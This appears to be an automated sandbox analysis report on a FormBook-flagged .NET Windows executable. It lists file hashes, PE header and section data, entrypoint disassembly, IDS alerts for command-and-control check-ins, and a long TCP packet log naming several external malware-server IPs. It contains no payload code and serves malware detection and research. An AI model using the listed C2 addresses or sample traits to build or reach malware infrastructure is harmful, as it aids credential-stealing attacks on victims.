                                                          SHA256:7e88c41f8c326c85f54f8df37579e2b846bb34fc821cc14e99c0bf43c4a8fd8a
                                                          SHA512:ca70d26a6f87c90dc9bc9d4184f12245be12715ba94bf45917897bb72607d03425d40423a8a62c73c4fc5abc1f1c07e31c552b5873726cc333d67382069f9f08
                                                          SSDEEP:24576:BgwS6Eni57eSQ8nbectxgo9wpGFhcQCJV:SbcVe+bztxgIGG0r
                                                          TLSH:9805F10076A9AF22E6BA5BF40431D27007B9BE9EA430E30E5ED49CDF3D12B855E45763
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....5g..............0..J...........g... ........@.. ....................................@................................

                                                          File Icon

                                                          Icon Hash:90cececece8e8eb0

                                                          Static PE Info

                                                          General

                                                          Entrypoint:0x4c67fe
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                          Time Stamp:0x673599B7 [Thu Nov 14 06:33:27 2024 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:4
                                                          OS Version Minor:0
                                                          File Version Major:4
                                                          File Version Minor:0
                                                          Subsystem Version Major:4
                                                          Subsystem Version Minor:0
                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                          Entrypoint Preview

                                                          Instruction
                                                          jmp dword ptr [00402000h]
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al

                                                          Data Directories

                                                          NameVirtual AddressVirtual Size Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xc67aa0x4f.text
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xc80000x5a4.rsrc
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0xca0000xc.reloc
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0xc2b640x54.text
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                          Sections

                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                          .text0x20000xc48040xc4a00fb5ed5476c839945f882eb60293aa3c6False0.8720448585505404data7.743367974972074IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                          .rsrc0xc80000x5a40x600c6b711292b2d652e69c9df15eaa8f3afFalse0.419921875data4.070528627940514IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .reloc0xca0000xc0x200b361fb24bd03d3c7081e2f19bc550a51False0.041015625data0.07763316234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                          Resources

                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                          RT_VERSION0xc80900x314data0.434010152284264
                                                          RT_MANIFEST0xc83b40x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                          Imports

                                                          DLLImport
                                                          mscoree.dll_CorExeMain

                                                          Network Behavior

                                                          Suricata IDS Alerts

                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                          2024-11-15T09:32:00.628951+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.114998185.159.66.9380TCP
                                                          2024-11-15T09:32:24.347747+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.114998591.184.0.20080TCP
                                                          2024-11-15T09:32:38.015857+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.1149989194.9.94.8680TCP
                                                          2024-11-15T09:32:51.741328+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.1149993170.39.213.4380TCP
                                                          2024-11-15T09:33:05.157377+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.114999713.248.169.4880TCP
                                                          2024-11-15T09:33:19.457187+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.115000138.47.232.19480TCP
                                                          2024-11-15T09:33:32.980413+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.1150005167.172.133.3280TCP
                                                          2024-11-15T09:33:46.389247+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.1150009162.0.211.14380TCP

                                                          Network Port Distribution

                                                          TCP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Nov 15, 2024 09:31:59.680448055 CET4998180192.168.2.1185.159.66.93
                                                          Nov 15, 2024 09:31:59.685403109 CET804998185.159.66.93192.168.2.11
                                                          Nov 15, 2024 09:31:59.685530901 CET4998180192.168.2.1185.159.66.93
                                                          Nov 15, 2024 09:31:59.701544046 CET4998180192.168.2.1185.159.66.93
                                                          Nov 15, 2024 09:31:59.706500053 CET804998185.159.66.93192.168.2.11
                                                          Nov 15, 2024 09:32:00.585974932 CET804998185.159.66.93192.168.2.11
                                                          Nov 15, 2024 09:32:00.628951073 CET4998180192.168.2.1185.159.66.93
                                                          Nov 15, 2024 09:32:00.739610910 CET804998185.159.66.93192.168.2.11
                                                          Nov 15, 2024 09:32:00.739804983 CET4998180192.168.2.1185.159.66.93
                                                          Nov 15, 2024 09:32:00.741106033 CET4998180192.168.2.1185.159.66.93
                                                          Nov 15, 2024 09:32:00.745940924 CET804998185.159.66.93192.168.2.11
                                                          Nov 15, 2024 09:32:15.828058004 CET4998280192.168.2.1191.184.0.200
                                                          Nov 15, 2024 09:32:15.833158016 CET804998291.184.0.200192.168.2.11
                                                          Nov 15, 2024 09:32:15.833246946 CET4998280192.168.2.1191.184.0.200
                                                          Nov 15, 2024 09:32:15.845979929 CET4998280192.168.2.1191.184.0.200
                                                          Nov 15, 2024 09:32:15.851159096 CET804998291.184.0.200192.168.2.11
                                                          Nov 15, 2024 09:32:16.643704891 CET804998291.184.0.200192.168.2.11
                                                          Nov 15, 2024 09:32:16.691459894 CET4998280192.168.2.1191.184.0.200
                                                          Nov 15, 2024 09:32:16.757355928 CET804998291.184.0.200192.168.2.11
                                                          Nov 15, 2024 09:32:16.757479906 CET4998280192.168.2.1191.184.0.200
                                                          Nov 15, 2024 09:32:17.350769997 CET4998280192.168.2.1191.184.0.200
                                                          Nov 15, 2024 09:32:18.366729021 CET4998380192.168.2.1191.184.0.200
                                                          Nov 15, 2024 09:32:18.371689081 CET804998391.184.0.200192.168.2.11
                                                          Nov 15, 2024 09:32:18.371903896 CET4998380192.168.2.1191.184.0.200
                                                          Nov 15, 2024 09:32:18.382411957 CET4998380192.168.2.1191.184.0.200
                                                          Nov 15, 2024 09:32:18.387485981 CET804998391.184.0.200192.168.2.11
                                                          Nov 15, 2024 09:32:19.221623898 CET804998391.184.0.200192.168.2.11
                                                          Nov 15, 2024 09:32:19.269510984 CET4998380192.168.2.1191.184.0.200
                                                          Nov 15, 2024 09:32:19.472944975 CET804998391.184.0.200192.168.2.11
                                                          Nov 15, 2024 09:32:19.473023891 CET804998391.184.0.200192.168.2.11
                                                          Nov 15, 2024 09:32:19.473052025 CET4998380192.168.2.1191.184.0.200
                                                          Nov 15, 2024 09:32:19.473483086 CET4998380192.168.2.1191.184.0.200
                                                          Nov 15, 2024 09:32:19.894556999 CET4998380192.168.2.1191.184.0.200
                                                          Nov 15, 2024 09:32:20.913517952 CET4998480192.168.2.1191.184.0.200
                                                          Nov 15, 2024 09:32:20.918690920 CET804998491.184.0.200192.168.2.11
                                                          Nov 15, 2024 09:32:20.918807030 CET4998480192.168.2.1191.184.0.200
                                                          Nov 15, 2024 09:32:20.934016943 CET4998480192.168.2.1191.184.0.200
                                                          Nov 15, 2024 09:32:20.939007044 CET804998491.184.0.200192.168.2.11
                                                          Nov 15, 2024 09:32:20.939124107 CET804998491.184.0.200192.168.2.11
                                                          Nov 15, 2024 09:32:21.758438110 CET804998491.184.0.200192.168.2.11
                                                          Nov 15, 2024 09:32:21.801029921 CET4998480192.168.2.1191.184.0.200
                                                          Nov 15, 2024 09:32:21.874741077 CET804998491.184.0.200192.168.2.11
                                                          Nov 15, 2024 09:32:21.874814987 CET4998480192.168.2.1191.184.0.200
                                                          Nov 15, 2024 09:32:22.441687107 CET4998480192.168.2.1191.184.0.200
                                                          Nov 15, 2024 09:32:23.460638046 CET4998580192.168.2.1191.184.0.200
                                                          Nov 15, 2024 09:32:23.465862036 CET804998591.184.0.200192.168.2.11
                                                          Nov 15, 2024 09:32:23.465998888 CET4998580192.168.2.1191.184.0.200
                                                          Nov 15, 2024 09:32:23.478744984 CET4998580192.168.2.1191.184.0.200
                                                          Nov 15, 2024 09:32:23.483583927 CET804998591.184.0.200192.168.2.11
                                                          Nov 15, 2024 09:32:24.292563915 CET804998591.184.0.200192.168.2.11
                                                          Nov 15, 2024 09:32:24.347747087 CET4998580192.168.2.1191.184.0.200
                                                          Nov 15, 2024 09:32:24.405087948 CET804998591.184.0.200192.168.2.11
                                                          Nov 15, 2024 09:32:24.405344963 CET4998580192.168.2.1191.184.0.200
                                                          Nov 15, 2024 09:32:24.406387091 CET4998580192.168.2.1191.184.0.200
                                                          Nov 15, 2024 09:32:24.411161900 CET804998591.184.0.200192.168.2.11
                                                          Nov 15, 2024 09:32:29.485124111 CET4998680192.168.2.11194.9.94.86
                                                          Nov 15, 2024 09:32:29.490015984 CET8049986194.9.94.86192.168.2.11
                                                          Nov 15, 2024 09:32:29.490128994 CET4998680192.168.2.11194.9.94.86
                                                          Nov 15, 2024 09:32:29.504849911 CET4998680192.168.2.11194.9.94.86
                                                          Nov 15, 2024 09:32:29.509749889 CET8049986194.9.94.86192.168.2.11
                                                          Nov 15, 2024 09:32:30.335912943 CET8049986194.9.94.86192.168.2.11
                                                          Nov 15, 2024 09:32:30.335938931 CET8049986194.9.94.86192.168.2.11
                                                          Nov 15, 2024 09:32:30.335952044 CET8049986194.9.94.86192.168.2.11
                                                          Nov 15, 2024 09:32:30.335995913 CET4998680192.168.2.11194.9.94.86
                                                          Nov 15, 2024 09:32:30.336018085 CET8049986194.9.94.86192.168.2.11
                                                          Nov 15, 2024 09:32:30.336031914 CET8049986194.9.94.86192.168.2.11
                                                          Nov 15, 2024 09:32:30.336072922 CET4998680192.168.2.11194.9.94.86
                                                          Nov 15, 2024 09:32:30.456832886 CET8049986194.9.94.86192.168.2.11
                                                          Nov 15, 2024 09:32:30.457068920 CET4998680192.168.2.11194.9.94.86
                                                          Nov 15, 2024 09:32:31.019727945 CET4998680192.168.2.11194.9.94.86
                                                          Nov 15, 2024 09:32:32.039891005 CET4998780192.168.2.11194.9.94.86
                                                          Nov 15, 2024 09:32:32.044879913 CET8049987194.9.94.86192.168.2.11
                                                          Nov 15, 2024 09:32:32.045074940 CET4998780192.168.2.11194.9.94.86
                                                          Nov 15, 2024 09:32:32.064378977 CET4998780192.168.2.11194.9.94.86
                                                          Nov 15, 2024 09:32:32.069341898 CET8049987194.9.94.86192.168.2.11
                                                          Nov 15, 2024 09:32:32.894706011 CET8049987194.9.94.86192.168.2.11
                                                          Nov 15, 2024 09:32:32.894757986 CET8049987194.9.94.86192.168.2.11
                                                          Nov 15, 2024 09:32:32.894783974 CET8049987194.9.94.86192.168.2.11
                                                          Nov 15, 2024 09:32:32.894798994 CET8049987194.9.94.86192.168.2.11
                                                          Nov 15, 2024 09:32:32.894814968 CET8049987194.9.94.86192.168.2.11
                                                          Nov 15, 2024 09:32:32.894829988 CET8049987194.9.94.86192.168.2.11
                                                          Nov 15, 2024 09:32:32.894988060 CET4998780192.168.2.11194.9.94.86
                                                          Nov 15, 2024 09:32:33.015243053 CET8049987194.9.94.86192.168.2.11
                                                          Nov 15, 2024 09:32:33.015325069 CET4998780192.168.2.11194.9.94.86
                                                          Nov 15, 2024 09:32:33.566557884 CET4998780192.168.2.11194.9.94.86
                                                          Nov 15, 2024 09:32:34.585386038 CET4998880192.168.2.11194.9.94.86
                                                          Nov 15, 2024 09:32:34.590928078 CET8049988194.9.94.86192.168.2.11
                                                          Nov 15, 2024 09:32:34.591099977 CET4998880192.168.2.11194.9.94.86
                                                          Nov 15, 2024 09:32:34.602211952 CET4998880192.168.2.11194.9.94.86
                                                          Nov 15, 2024 09:32:34.607233047 CET8049988194.9.94.86192.168.2.11
                                                          Nov 15, 2024 09:32:34.607266903 CET8049988194.9.94.86192.168.2.11
                                                          Nov 15, 2024 09:32:35.472021103 CET8049988194.9.94.86192.168.2.11
                                                          Nov 15, 2024 09:32:35.472040892 CET8049988194.9.94.86192.168.2.11
                                                          Nov 15, 2024 09:32:35.472057104 CET8049988194.9.94.86192.168.2.11
                                                          Nov 15, 2024 09:32:35.472071886 CET8049988194.9.94.86192.168.2.11
                                                          Nov 15, 2024 09:32:35.472088099 CET8049988194.9.94.86192.168.2.11
                                                          Nov 15, 2024 09:32:35.472104073 CET8049988194.9.94.86192.168.2.11
                                                          Nov 15, 2024 09:32:35.472374916 CET4998880192.168.2.11194.9.94.86
                                                          Nov 15, 2024 09:32:35.609214067 CET8049988194.9.94.86192.168.2.11
                                                          Nov 15, 2024 09:32:35.609529018 CET4998880192.168.2.11194.9.94.86
                                                          Nov 15, 2024 09:32:36.113459110 CET4998880192.168.2.11194.9.94.86
                                                          Nov 15, 2024 09:32:37.180027008 CET4998980192.168.2.11194.9.94.86
                                                          Nov 15, 2024 09:32:37.185853004 CET8049989194.9.94.86192.168.2.11
                                                          Nov 15, 2024 09:32:37.185934067 CET4998980192.168.2.11194.9.94.86
                                                          Nov 15, 2024 09:32:37.205796003 CET4998980192.168.2.11194.9.94.86
                                                          Nov 15, 2024 09:32:37.210901976 CET8049989194.9.94.86192.168.2.11
                                                          Nov 15, 2024 09:32:38.015513897 CET8049989194.9.94.86192.168.2.11
                                                          Nov 15, 2024 09:32:38.015625954 CET8049989194.9.94.86192.168.2.11
                                                          Nov 15, 2024 09:32:38.015640020 CET8049989194.9.94.86192.168.2.11
                                                          Nov 15, 2024 09:32:38.015655041 CET8049989194.9.94.86192.168.2.11
                                                          Nov 15, 2024 09:32:38.015671015 CET8049989194.9.94.86192.168.2.11
                                                          Nov 15, 2024 09:32:38.015687943 CET8049989194.9.94.86192.168.2.11
                                                          Nov 15, 2024 09:32:38.015856981 CET4998980192.168.2.11194.9.94.86
                                                          Nov 15, 2024 09:32:38.015893936 CET4998980192.168.2.11194.9.94.86
                                                          Nov 15, 2024 09:32:38.136569977 CET8049989194.9.94.86192.168.2.11
                                                          Nov 15, 2024 09:32:38.136981010 CET4998980192.168.2.11194.9.94.86
                                                          Nov 15, 2024 09:32:38.138170004 CET4998980192.168.2.11194.9.94.86
                                                          Nov 15, 2024 09:32:38.143054962 CET8049989194.9.94.86192.168.2.11
                                                          Nov 15, 2024 09:32:43.510993004 CET4999080192.168.2.11170.39.213.43
                                                          Nov 15, 2024 09:32:43.515923977 CET8049990170.39.213.43192.168.2.11
                                                          Nov 15, 2024 09:32:43.516057014 CET4999080192.168.2.11170.39.213.43
                                                          Nov 15, 2024 09:32:43.527249098 CET4999080192.168.2.11170.39.213.43
                                                          Nov 15, 2024 09:32:43.532520056 CET8049990170.39.213.43192.168.2.11
                                                          Nov 15, 2024 09:32:44.114614964 CET8049990170.39.213.43192.168.2.11
                                                          Nov 15, 2024 09:32:44.115288973 CET8049990170.39.213.43192.168.2.11
                                                          Nov 15, 2024 09:32:44.115377903 CET4999080192.168.2.11170.39.213.43
                                                          Nov 15, 2024 09:32:45.035289049 CET4999080192.168.2.11170.39.213.43
                                                          Nov 15, 2024 09:32:46.053757906 CET4999180192.168.2.11170.39.213.43
                                                          Nov 15, 2024 09:32:46.058888912 CET8049991170.39.213.43192.168.2.11
                                                          Nov 15, 2024 09:32:46.058979988 CET4999180192.168.2.11170.39.213.43
                                                          Nov 15, 2024 09:32:46.072084904 CET4999180192.168.2.11170.39.213.43
                                                          Nov 15, 2024 09:32:46.077100992 CET8049991170.39.213.43192.168.2.11
                                                          Nov 15, 2024 09:32:46.651662111 CET8049991170.39.213.43192.168.2.11
                                                          Nov 15, 2024 09:32:46.652662039 CET8049991170.39.213.43192.168.2.11
                                                          Nov 15, 2024 09:32:46.652717113 CET4999180192.168.2.11170.39.213.43
                                                          Nov 15, 2024 09:32:47.582192898 CET4999180192.168.2.11170.39.213.43
                                                          Nov 15, 2024 09:32:48.600877047 CET4999280192.168.2.11170.39.213.43
                                                          Nov 15, 2024 09:32:48.605962038 CET8049992170.39.213.43192.168.2.11
                                                          Nov 15, 2024 09:32:48.606103897 CET4999280192.168.2.11170.39.213.43
                                                          Nov 15, 2024 09:32:48.616911888 CET4999280192.168.2.11170.39.213.43
                                                          Nov 15, 2024 09:32:48.621846914 CET8049992170.39.213.43192.168.2.11
                                                          Nov 15, 2024 09:32:48.621953964 CET8049992170.39.213.43192.168.2.11
                                                          Nov 15, 2024 09:32:49.193069935 CET8049992170.39.213.43192.168.2.11
                                                          Nov 15, 2024 09:32:49.194561005 CET8049992170.39.213.43192.168.2.11
                                                          Nov 15, 2024 09:32:49.194624901 CET4999280192.168.2.11170.39.213.43
                                                          Nov 15, 2024 09:32:50.129295111 CET4999280192.168.2.11170.39.213.43
                                                          Nov 15, 2024 09:32:51.148152113 CET4999380192.168.2.11170.39.213.43
                                                          Nov 15, 2024 09:32:51.153187037 CET8049993170.39.213.43192.168.2.11
                                                          Nov 15, 2024 09:32:51.153291941 CET4999380192.168.2.11170.39.213.43
                                                          Nov 15, 2024 09:32:51.160948038 CET4999380192.168.2.11170.39.213.43
                                                          Nov 15, 2024 09:32:51.165875912 CET8049993170.39.213.43192.168.2.11
                                                          Nov 15, 2024 09:32:51.740057945 CET8049993170.39.213.43192.168.2.11
                                                          Nov 15, 2024 09:32:51.741229057 CET8049993170.39.213.43192.168.2.11
                                                          Nov 15, 2024 09:32:51.741328001 CET4999380192.168.2.11170.39.213.43
                                                          Nov 15, 2024 09:32:51.744060993 CET4999380192.168.2.11170.39.213.43
                                                          Nov 15, 2024 09:32:51.750072956 CET8049993170.39.213.43192.168.2.11
                                                          Nov 15, 2024 09:32:56.790878057 CET4999480192.168.2.1113.248.169.48
                                                          Nov 15, 2024 09:32:56.796107054 CET804999413.248.169.48192.168.2.11
                                                          Nov 15, 2024 09:32:56.796906948 CET4999480192.168.2.1113.248.169.48
                                                          Nov 15, 2024 09:32:56.809571981 CET4999480192.168.2.1113.248.169.48
                                                          Nov 15, 2024 09:32:56.814625978 CET804999413.248.169.48192.168.2.11
                                                          Nov 15, 2024 09:32:57.497752905 CET804999413.248.169.48192.168.2.11
                                                          Nov 15, 2024 09:32:57.497894049 CET4999480192.168.2.1113.248.169.48
                                                          Nov 15, 2024 09:32:58.316739082 CET4999480192.168.2.1113.248.169.48
                                                          Nov 15, 2024 09:32:58.321800947 CET804999413.248.169.48192.168.2.11
                                                          Nov 15, 2024 09:32:59.334943056 CET4999580192.168.2.1113.248.169.48
                                                          Nov 15, 2024 09:32:59.340248108 CET804999513.248.169.48192.168.2.11
                                                          Nov 15, 2024 09:32:59.340370893 CET4999580192.168.2.1113.248.169.48
                                                          Nov 15, 2024 09:32:59.355031013 CET4999580192.168.2.1113.248.169.48
                                                          Nov 15, 2024 09:32:59.360094070 CET804999513.248.169.48192.168.2.11
                                                          Nov 15, 2024 09:33:00.038557053 CET804999513.248.169.48192.168.2.11
                                                          Nov 15, 2024 09:33:00.038675070 CET4999580192.168.2.1113.248.169.48
                                                          Nov 15, 2024 09:33:00.864175081 CET4999580192.168.2.1113.248.169.48
                                                          Nov 15, 2024 09:33:00.869184017 CET804999513.248.169.48192.168.2.11
                                                          Nov 15, 2024 09:33:01.882421970 CET4999680192.168.2.1113.248.169.48
                                                          Nov 15, 2024 09:33:01.887464046 CET804999613.248.169.48192.168.2.11
                                                          Nov 15, 2024 09:33:01.887574911 CET4999680192.168.2.1113.248.169.48
                                                          Nov 15, 2024 09:33:01.899226904 CET4999680192.168.2.1113.248.169.48
                                                          Nov 15, 2024 09:33:01.904129982 CET804999613.248.169.48192.168.2.11
                                                          Nov 15, 2024 09:33:01.904165030 CET804999613.248.169.48192.168.2.11
                                                          Nov 15, 2024 09:33:02.553599119 CET804999613.248.169.48192.168.2.11
                                                          Nov 15, 2024 09:33:02.553798914 CET4999680192.168.2.1113.248.169.48
                                                          Nov 15, 2024 09:33:03.410342932 CET4999680192.168.2.1113.248.169.48
                                                          Nov 15, 2024 09:33:03.415365934 CET804999613.248.169.48192.168.2.11
                                                          Nov 15, 2024 09:33:04.428764105 CET4999780192.168.2.1113.248.169.48
                                                          Nov 15, 2024 09:33:04.433757067 CET804999713.248.169.48192.168.2.11
                                                          Nov 15, 2024 09:33:04.433866024 CET4999780192.168.2.1113.248.169.48
                                                          Nov 15, 2024 09:33:04.441015959 CET4999780192.168.2.1113.248.169.48
                                                          Nov 15, 2024 09:33:04.445899963 CET804999713.248.169.48192.168.2.11
                                                          Nov 15, 2024 09:33:05.122713089 CET804999713.248.169.48192.168.2.11
                                                          Nov 15, 2024 09:33:05.157073021 CET804999713.248.169.48192.168.2.11
                                                          Nov 15, 2024 09:33:05.157377005 CET4999780192.168.2.1113.248.169.48
                                                          Nov 15, 2024 09:33:05.160496950 CET4999780192.168.2.1113.248.169.48
                                                          Nov 15, 2024 09:33:05.165455103 CET804999713.248.169.48192.168.2.11
                                                          Nov 15, 2024 09:33:10.827517986 CET4999880192.168.2.1138.47.232.194
                                                          Nov 15, 2024 09:33:10.833499908 CET804999838.47.232.194192.168.2.11
                                                          Nov 15, 2024 09:33:10.833590031 CET4999880192.168.2.1138.47.232.194
                                                          Nov 15, 2024 09:33:10.845314980 CET4999880192.168.2.1138.47.232.194
                                                          Nov 15, 2024 09:33:10.851128101 CET804999838.47.232.194192.168.2.11
                                                          Nov 15, 2024 09:33:11.797110081 CET804999838.47.232.194192.168.2.11
                                                          Nov 15, 2024 09:33:11.847759962 CET4999880192.168.2.1138.47.232.194
                                                          Nov 15, 2024 09:33:11.978266001 CET804999838.47.232.194192.168.2.11
                                                          Nov 15, 2024 09:33:11.978457928 CET4999880192.168.2.1138.47.232.194
                                                          Nov 15, 2024 09:33:12.347891092 CET4999880192.168.2.1138.47.232.194
                                                          Nov 15, 2024 09:33:13.366658926 CET4999980192.168.2.1138.47.232.194
                                                          Nov 15, 2024 09:33:13.372004032 CET804999938.47.232.194192.168.2.11
                                                          Nov 15, 2024 09:33:13.372114897 CET4999980192.168.2.1138.47.232.194
                                                          Nov 15, 2024 09:33:13.382946968 CET4999980192.168.2.1138.47.232.194
                                                          Nov 15, 2024 09:33:13.387943029 CET804999938.47.232.194192.168.2.11
                                                          Nov 15, 2024 09:33:14.326690912 CET804999938.47.232.194192.168.2.11
                                                          Nov 15, 2024 09:33:14.379074097 CET4999980192.168.2.1138.47.232.194
                                                          Nov 15, 2024 09:33:14.508667946 CET804999938.47.232.194192.168.2.11
                                                          Nov 15, 2024 09:33:14.508796930 CET4999980192.168.2.1138.47.232.194
                                                          Nov 15, 2024 09:33:14.894913912 CET4999980192.168.2.1138.47.232.194
                                                          Nov 15, 2024 09:33:15.913394928 CET5000080192.168.2.1138.47.232.194
                                                          Nov 15, 2024 09:33:15.918414116 CET805000038.47.232.194192.168.2.11
                                                          Nov 15, 2024 09:33:15.918513060 CET5000080192.168.2.1138.47.232.194
                                                          Nov 15, 2024 09:33:15.930581093 CET5000080192.168.2.1138.47.232.194
                                                          Nov 15, 2024 09:33:15.935421944 CET805000038.47.232.194192.168.2.11
                                                          Nov 15, 2024 09:33:15.935575008 CET805000038.47.232.194192.168.2.11
                                                          Nov 15, 2024 09:33:16.886461020 CET805000038.47.232.194192.168.2.11
                                                          Nov 15, 2024 09:33:16.941579103 CET5000080192.168.2.1138.47.232.194
                                                          Nov 15, 2024 09:33:17.068716049 CET805000038.47.232.194192.168.2.11
                                                          Nov 15, 2024 09:33:17.068828106 CET5000080192.168.2.1138.47.232.194
                                                          Nov 15, 2024 09:33:17.441783905 CET5000080192.168.2.1138.47.232.194
                                                          Nov 15, 2024 09:33:18.461576939 CET5000180192.168.2.1138.47.232.194
                                                          Nov 15, 2024 09:33:18.466573954 CET805000138.47.232.194192.168.2.11
                                                          Nov 15, 2024 09:33:18.466703892 CET5000180192.168.2.1138.47.232.194
                                                          Nov 15, 2024 09:33:18.482115030 CET5000180192.168.2.1138.47.232.194
                                                          Nov 15, 2024 09:33:18.487010956 CET805000138.47.232.194192.168.2.11
                                                          Nov 15, 2024 09:33:19.413183928 CET805000138.47.232.194192.168.2.11
                                                          Nov 15, 2024 09:33:19.457186937 CET5000180192.168.2.1138.47.232.194
                                                          Nov 15, 2024 09:33:19.595577002 CET805000138.47.232.194192.168.2.11
                                                          Nov 15, 2024 09:33:19.595746040 CET5000180192.168.2.1138.47.232.194
                                                          Nov 15, 2024 09:33:19.596998930 CET5000180192.168.2.1138.47.232.194
                                                          Nov 15, 2024 09:33:19.602081060 CET805000138.47.232.194192.168.2.11
                                                          Nov 15, 2024 09:33:24.618588924 CET5000280192.168.2.11167.172.133.32
                                                          Nov 15, 2024 09:33:24.623598099 CET8050002167.172.133.32192.168.2.11
                                                          Nov 15, 2024 09:33:24.623680115 CET5000280192.168.2.11167.172.133.32
                                                          Nov 15, 2024 09:33:24.637320995 CET5000280192.168.2.11167.172.133.32
                                                          Nov 15, 2024 09:33:24.642321110 CET8050002167.172.133.32192.168.2.11
                                                          Nov 15, 2024 09:33:25.284940958 CET8050002167.172.133.32192.168.2.11
                                                          Nov 15, 2024 09:33:25.323867083 CET8050002167.172.133.32192.168.2.11
                                                          Nov 15, 2024 09:33:25.323982954 CET5000280192.168.2.11167.172.133.32
                                                          Nov 15, 2024 09:33:26.144980907 CET5000280192.168.2.11167.172.133.32
